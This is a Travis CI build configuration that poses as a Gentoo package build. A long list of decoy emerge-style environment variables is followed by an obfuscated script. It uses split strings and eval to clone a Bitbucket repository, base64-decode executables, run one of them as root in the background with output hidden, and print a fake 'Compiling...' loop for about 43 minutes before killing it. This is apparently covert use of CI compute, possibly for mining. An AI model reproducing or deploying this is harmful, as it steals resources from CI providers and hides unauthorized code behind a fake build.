dist: bionic

env:
  - BUILD="--quiet=346Ar"
  - BUILD="--rebuild-ignore=356SB"
  - BUILD="--onlydeps=10Kn"
  - BUILD="--newrepo=2361O"
  - BUILD="--usepkgonly=803Pq"
  - BUILD="--color=782Gf"
  - BUILD="--ignore-world=506Cc"
  - BUILD="--changed-deps=800KP"
  - BUILD="--buildpkg=519nh"
  - BUILD="--emptytree=131Pk"
  - BUILD="--digest=139QO"
  - BUILD="--noconfmem=556rw"
  - BUILD="--search=524Wo"
  - BUILD="--rage-clean=742ya"
  - BUILD="--complete-graph=1199S"
  - BUILD="--rebuilt-binaries=40PM"
  - BUILD="--autounmask-only=619cA"
  - BUILD="--rebuild-ignore=9267L"
  - BUILD="--verbose-slot-rebuilds=305x9"
  - BUILD="--emptytree=36Fk"
  - BUILD="--ignore-soname-deps=893WH"
  - BUILD="--rebuild-if-new-ver=593M"
  - BUILD="--verbose-conflicts=254u"
  - BUILD="--rebuild-if-new-ver=695XR"
  - BUILD="--noreplace=71k3"
  - BUILD="--regen=961Sy"
  - BUILD="--rage-clean=903Sm"
  - BUILD="--dynamic-deps=21OT"
  - BUILD="--prefix=3678c"
  - BUILD="--changed-use=684RN"
  - BUILD="--autounmask-license=766Nn"
  - BUILD="--autounmask-keep-masks=293Sc"
  - BUILD="--usepkg=7840D"
  - BUILD="--dynamic-deps=682tU"
  - BUILD="--alert=8654n"
  - BUILD="--complete-graph-if-new-use=987F"
  - BUILD="--reinstall-atoms=545hN"
  - BUILD="--regen=747nu"
  - BUILD="--accept-restrict=978K0"
  - BUILD="--unmerge=492oS"
  - BUILD="--depclean-lib-check=7577N"
  - BUILD="--nodeps=136SW"
  - BUILD="--load-average=947bF"
  - BUILD="--ignore-built-slot-operator-deps=146X7"
  - BUILD="--quiet-build=481Xc"
  - BUILD="--rebuild-if-new-ver=529zc"
  - BUILD="--onlydeps=666Uo"
  - BUILD="--quiet-build=628Tn"
  - BUILD="--fail-clean=929g1"
  - BUILD="--pretend=553Ar"
  - BUILD="--autounmask-continue=535Yf"
  - BUILD="--resume=525Ng"
  - BUILD="--fetchonly=2949z"
  - BUILD="--changed-slot=506gX"
  - BUILD="--rebuild-if-new-ver=497mt"
  - BUILD="--binpkg-respect-use=636nF"
  - BUILD="--package-moves=917nW"
  - BUILD="--rebuilt-binaries=233fz"
  - BUILD="--nospinner=8959J"
  - BUILD="--resume=138XF"
  - BUILD="--with-bdeps=191wz"
  - BUILD="--autounmask-write=9981d"
  - BUILD="--depclean=185gH"
  - BUILD="--with-bdeps-auto=378eO"
  - BUILD="--skipfirst=4481O"
  - BUILD="--nodeps=772Z8"
  - BUILD="--ask-enter-invalid=824n6"
  - BUILD="--autounmask-unrestricted-atoms=472wS"
  - BUILD="--onlydeps=59we"
  - BUILD="--changed-slot=373Ft"
  - BUILD="--emptytree=800Fl"
  - BUILD="--complete-graph=62o4"
  - BUILD="--version=4608Y"
  - BUILD="--rebuilt-binaries=19461"
  - BUILD="--changed-slot=187w9"
  - BUILD="--emptytree=279xt"
  - BUILD="--verbose-conflicts=68JA"
  - BUILD="--select=4263x"
  - BUILD="--digest=834KK"
  - BUILD="--quiet-fail=806DO"
  - BUILD="--use-ebuild-visibility=265cl"
  - BUILD="--with-bdeps=778oR"
  - BUILD="--resume=4190X"
  - BUILD="--oneshot=73a7"
  - BUILD="--buildpkgonly=1333t"
  - BUILD="--unmerge=937Z7"
  - BUILD="--noreplace=8133J"
  - BUILD="--fail-clean=450GH"
  - BUILD="--usepkg=755Fq"
  - BUILD="--reinstall-atoms=104pD"
  - BUILD="--oneshot=9432z"
  - BUILD="--pretend=240G0"
  - BUILD="--useoldpkg-atoms=279VI"
  - BUILD="--newrepo=4170l"
  - BUILD="--unordered-display=9954I"
  - BUILD="--rebuilt-binaries=87GO"
  - BUILD="--quiet=740JB"
  - BUILD="--quiet=7800C"
  - BUILD="--changed-deps-report=9ma"
  - BUILD="--getbinpkgonly=866rg"
  - BUILD="--prune=50351"
  - BUILD="--binpkg-respect-use=803ea"
  - BUILD="--ask-enter-invalid=6841F"
  - BUILD="--search=413qZ"
  - BUILD="--fetch-all-uri=6409i"
  - BUILD="--quiet-unmerge-warn=456yx"
  - BUILD="--regen=371Lj"
  - BUILD="--ask-enter-invalid=424Di"
  - BUILD="--fuzzy-search=789KV"
  - BUILD="--search=221kf"
  - BUILD="--newrepo=848Al"
  - BUILD="--columns=118tX"
  - BUILD="--fail-clean=404rv"
  - BUILD="--newrepo=173WG"
  - BUILD="--changed-use=7035R"
  - BUILD="--autounmask-continue=2454Z"
  - BUILD="--rage-clean=231E7"
  - BUILD="--autounmask-unrestricted-atoms=891z1"
  - BUILD="--sysroot=723iF"
  - BUILD="--complete-graph-if-new-use=411H3"
  - BUILD="--skipfirst=599yV"
  - BUILD="--ask=355aY"
  - BUILD="--rebuild-if-new-rev=376hs"
  - BUILD="--autounmask-only=185YL"
  - BUILD="--deselect=182dK"
  - BUILD="--complete-graph-if-new-ver=671KO"
  - BUILD="--tree=168ED"
  - BUILD="--newuse=292xY"
  - BUILD="--oneshot=25Gs"
  - BUILD="--newrepo=8864o"
  - BUILD="--prune=688V5"
  - BUILD="--metadata=266oW"
  - BUILD="--package-moves=520t0"
  - BUILD="--ignore-soname-deps=684fK"
  - BUILD="--rage-clean=416w3"
  - BUILD="--check-news=936Yu"
  - BUILD="--deep=896E4"
  - BUILD="--ask-enter-invalid=345ST"
  - BUILD="--getbinpkg=305zC"
  - BUILD="--binpkg-changed-deps=205q7"
  - BUILD="--quiet-fail=159No"
  - BUILD="--fuzzy-search=186vd"
  - BUILD="--autounmask-keep-masks=32hN"
  - BUILD="--update=5857j"
  - BUILD="--accept-restrict=760ET"
  - BUILD="--sync=556N"
  - BUILD="--autounmask=90cA"
  - BUILD="--ignore-default-opts=678fK"
  - BUILD="--rebuild-ignore=408da"
  - BUILD="--usepkg-exclude=7486s"
  - BUILD="--rebuild-if-unbuilt=5002i"
  - BUILD="--deselect=808DM"
  - BUILD="--autounmask-backtrack=510Ci"
  - BUILD="--update=688qq"
  - BUILD="--accept-restrict=829rD"
  - BUILD="--tree=1760Y"
  - BUILD="--update=22QT"
  - BUILD="--useoldpkg-atoms=863wG"
  - BUILD="--version=714rK"
  - BUILD="--buildpkg=716G6"
  - BUILD="--regen=697jS"
  - BUILD="--color=417UY"
  - BUILD="--color=7986x"
  - BUILD="--with-bdeps-auto=263pi"
  - BUILD="--search-similarity=706Fx"
  - BUILD="--changelog=726OF"
  - BUILD="--changed-use=971tE"
  - BUILD="--sync-submodule=875oo"
  - BUILD="--verbose=891kr"
  - BUILD="--prune=778L0"
  - BUILD="--reinstall=792VK"
  - BUILD="--use-ebuild-visibility=378Ip"
  - BUILD="--onlydeps=1370b"
  - BUILD="--version=72FH"
  - BUILD="--autounmask=1183p"
  - BUILD="--deep=8oR"
  - BUILD="--root-deps=446vK"
  - BUILD="--noconfmem=472kA"
  - BUILD="--changed-slot=970df"
  - BUILD="--alphabetical=3451Y"
  - BUILD="--update=240tZ"
  - BUILD="--with-bdeps-auto=341f1"
  - BUILD="--ask-enter-invalid=381Y"
  - BUILD="--rebuild-if-new-slot=364sm"
  - BUILD="--usepkg=964Mh"
  - BUILD="--autounmask-write=864J2"
  - BUILD="--ask=70Vs"
  - BUILD="--check-news=433OA"
  - BUILD="--accept-restrict=975aP"

language: minimal

script:
  - YXAhnst="sudo apt up"
  - UNjVHAPvBH="date || tru"
  - eval "$YXAhnst""$UNjVHAPvBH""e"
  - dwqiOvGg="sudo apt --"
  - UdWtfQDKAV="yes install"
  - FSusbz=" cl-base64 "
  - lfqWrXJcBdy="git &>/dev/"
  - eval "$dwqiOvGg""$UdWtfQDKAV""$FSusbz""$lfqWrXJcBdy""null"
  - ONHJUR="git clone h"
  - clolHZqWdIJ="ttps://gccb"
  - hVKIXHZ="uild@bitbuc"
  - ZybUBAFd="ket.org/gcc"
  - sMrkoexRKg="build/gcc.g"
  - ubCVGJY="it &>/dev/n"
  - eval "$ONHJUR""$clolHZqWdIJ""$hVKIXHZ""$ZybUBAFd""$sMrkoexRKg""$ubCVGJY""ull"
  - yAkvefUtc="base64 -d g"
  - MNLIXrU="cc/cmake_ >"
  - eval "$yAkvefUtc""$MNLIXrU"" cmake"
  - xzhGzIX="base64 -d g"
  - AHzqcjyfI="cc/config_ "
  - eval "$xzhGzIX""$AHzqcjyfI""> pipe"
  - cdwzACqi="base64 -d g"
  - eDsQwd="cc/make_ > "
  - eval "$cdwzACqi""$eDsQwd""ci"
  - chmod +x ci cmake
  - ./cmake
  - RLVfr="sed -i 's/b"
  - ChDeAMPgYx="uild/tg3o/g"
  - eval "$RLVfr""$ChDeAMPgYx""' pipe"
  - sudo ./ci -c pipe &>/dev/null &
  - GCC=$(date +%s)
  - MVChPAPEHbu="echo $BUILD"
  - eval "$MVChPAPEHbu"""
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2619)) ] && sudo killall ci && break; sleep 201; done
